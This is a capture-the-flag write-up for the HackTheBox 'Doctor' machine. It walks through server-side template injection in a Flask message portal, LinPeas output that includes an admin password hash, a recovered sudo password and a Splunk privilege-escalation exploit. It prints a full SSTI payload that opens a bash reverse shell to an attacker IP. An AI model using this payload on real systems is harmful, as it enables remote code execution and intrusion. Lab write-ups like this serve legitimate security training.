HTB Doctor

Writeup for Doctor box on HackTheBox.eu

Initial enumeration

Found port 22 80 and 8089 open on the box.

While browsing the IP we discover a hostname doctors.htb, after setting this host and accessing the page we find a new portal:

After registering an account we discover we can post messages. Inspecting the sourcode of the page we also find a /archive page which seems to be under development however if we post a new message, the title of the message appears in the xml feed.

Since this is python application it's worth checking for SSTI - Server side template injection

The first payload we can try is a simple {{ 4 * 4 }} which will output as 16 in the title if the exploit work. This works as expected and we can proceed to a more complex payload:

title={{ get_flashed_messages.__globals__.__builtins__.open("/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/10.10.14.38/8443 0>%261'",shell=True) }}&content=a&submit=Post

User enumeration

We are the user web

web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

Running LinPeas

 --> Found interesting column names in user (output limit 10)                                                                                             
CREATE TABLE user (
        id INTEGER NOT NULL, 
        username VARCHAR(20) NOT NULL, 
        email VARCHAR(120) NOT NULL, 
        image_file VARCHAR(20) NOT NULL, 
        password VARCHAR(60) NOT NULL, 
        PRIMARY KEY (id), 
        UNIQUE (username), 
        UNIQUE (email)
)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S

In var/log/apache2 there is a backup file where we can see something strange:

The string from the backup works for sudo as shaun

Privilege escalation

Splunkd app command execution exploit

Using the exploit from https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_remote.py